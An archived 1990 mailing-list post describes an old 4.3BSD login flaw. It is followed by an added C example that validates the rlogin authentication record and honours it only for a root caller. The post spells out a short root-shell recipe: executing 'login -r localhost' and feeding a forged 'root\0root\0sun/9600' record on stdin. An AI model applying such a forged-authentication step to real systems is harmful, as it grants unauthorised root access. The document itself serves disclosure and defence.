Old rlogin bug
David J. MacKenzie
djm at eng.umd.edu
Thu Jul 26 09:01:01 AEST 1990
Mike Rowan, who wrote the GNU login (still in test stage), sent me a
note recently that might be relevant here, excerpted below:
On a standard 4.3 login system write a program that does this:
fork() & exec login
write to login's stdin:
locuser\0remuser\0tty/speed\0
So I log in to a host and run this like so:
exec "login -r localhost"
and stick this on login's stdin: "root\0root\0sun/9600"
And I get a root shell. They took this auth code out of login in 4.3T
and made rlogind do it.
--
David J. MacKenzie <djm at eng.umd.edu> <djm at ai.mit.edu>
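The weakness described in the note is that login accepted the pre-authenticated locuser\0remuser\0tty/speed\0 record from any caller's stdin. The following C example is added here and is not code from the original post or from any BSD or GNU login source: it parses that record with bounds checks and accepts it only when the invoking real uid is 0. The function names, the FIELD_MAX limit and the uid gate are assumptions for illustration; the fix the note describes is moving the check into rlogind.

```c
#include <stddef.h>
#include <string.h>
#include <sys/types.h>

#define FIELD_MAX 16  /* assumed per-field limit, not taken from the post */

struct rlogin_hello {
    char locuser[FIELD_MAX + 1];
    char remuser[FIELD_MAX + 1];
    char term[2 * FIELD_MAX + 1];  /* "tty/speed", e.g. "sun/9600" */
};

/* Copy one NUL-terminated field starting at buf[*pos]. Returns 0 on success,
 * -1 if the field is empty, too long, or not terminated inside the buffer. */
static int take_field(const char *buf, size_t len, size_t *pos,
                      char *dst, size_t dst_size)
{
    const char *start = buf + *pos;
    const char *nul = memchr(start, '\0', len - *pos);
    if (nul == NULL)
        return -1;
    size_t n = (size_t)(nul - start);
    if (n == 0 || n >= dst_size)
        return -1;
    memcpy(dst, start, n + 1);  /* n bytes plus the terminating NUL */
    *pos += n + 1;
    return 0;
}

/* Parse exactly three fields; trailing bytes after the third are rejected. */
int parse_rlogin_hello(const char *buf, size_t len, struct rlogin_hello *out)
{
    size_t pos = 0;
    if (take_field(buf, len, &pos, out->locuser, sizeof out->locuser) ||
        take_field(buf, len, &pos, out->remuser, sizeof out->remuser) ||
        take_field(buf, len, &pos, out->term, sizeof out->term))
        return -1;
    return pos == len ? 0 : -1;
}

/* Gate: the record is an authentication claim, so honour it only when the
 * caller is root (a daemon such as rlogind). A real login would pass getuid();
 * real_uid is a parameter here so the check can be exercised directly. */
int accept_remote_auth(uid_t real_uid, const char *buf, size_t len,
                       struct rlogin_hello *out)
{
    if (real_uid != 0)
        return -1;  /* an ordinary user's stdin is never trusted */
    return parse_rlogin_hello(buf, len, out);
}
```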